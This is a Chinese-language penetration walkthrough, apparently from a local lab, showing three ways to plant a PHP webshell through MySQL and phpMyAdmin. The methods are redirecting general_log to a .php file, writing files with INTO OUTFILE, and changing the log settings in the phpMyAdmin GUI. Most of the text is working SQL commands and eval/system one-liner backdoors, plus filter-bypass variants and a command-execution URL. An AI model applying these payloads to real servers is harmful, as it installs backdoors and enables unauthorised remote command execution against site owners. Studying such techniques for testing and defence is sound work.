环境搭建
安装mysql管理工具
漏洞复现
姿势⼀:通过⽇志⽂件拿Shell
利⽤mysql⽇志⽂件写shell,这个⽇志可以在mysql⾥改变它的存放位置,登录phpmyadmin可以修改 这个存放位置,并且可以修改它的后缀名。所以可以修改成php的后缀名就能获取⼀个webshell 。
show global variables like '%general%';
set global general_log='on'; //⽇志保存状态开启;
set global general_log_file = 'C:/phpStudy/PHPTutorial/WWW/mafa.php' //修
改⽇志的保存位置。
show global variables like '%general%';
select '<?php eval($_POST["admin"]);?>';
bypass:
select+'<?php+phpinfo();+?>'
select+'<?php+//%0Aphpinfo();+?>'
设置日志保存地址
查询php木马
日志中成功出现我们的一句话木马
用蚁剑连接
姿势⼆:导⼊导出拿WebShell
思路:通过SQL语句拿webshell ⽤ into outfile 把后⻔写到⽹站⽬录上。
1.⾸先判断mysql位置
select @@datadir
路径:C:\phpStudy\MySQL\data\
2.猜测web路径
猜测web路径:C:\phpStudy\www
C:\phpStudy\WWW\web.php
3.写webshell
select "<?php eval($_POST[a]);?>" into outfile 'c:/phpstudy/www/b.php';
select "<?php system($_GET[a]);?>" into outfile 'c:/phpstudy/PHPTutorial/w
ww/d.php';
4.浏览器
http://192.168.2.8/d.php?a=dir ..\
select "<?php phpinfo();eval($_POST[a]);?>" into outfile 'C:\phpStudy\WWW
\web.php';
备注:/
不要⽤\,如⾥要⽤\\(转义)上传我们的一句话木马后门到网站根目录
用蚁剑去链接
姿势三:界⾯图像化GetShell
phpmyadmin管理台
变量:⽇志 搜索:gen
log:on
file:C:\phpStudy\PHPTutorial\www\c.php
sql:
select "<?php eval($_POST[a]);?>";找到变量搜索
这里我们看到了日志保存位置
我们可以手动去改这个日志保存位置
剩余步骤同姿势一
select 我们的一句话木马,然后访问日志 ,即可获得后门.
